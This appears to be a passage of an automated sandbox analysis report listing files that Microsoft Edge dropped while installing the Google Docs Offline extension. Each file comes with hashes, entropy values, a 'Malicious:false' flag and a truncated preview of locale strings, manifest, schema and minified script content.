                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11280
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                  MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                  SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                  SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                  SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                  MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                  SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                  SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                  SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):98880
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                  MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                  SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                  SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                  SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):107677
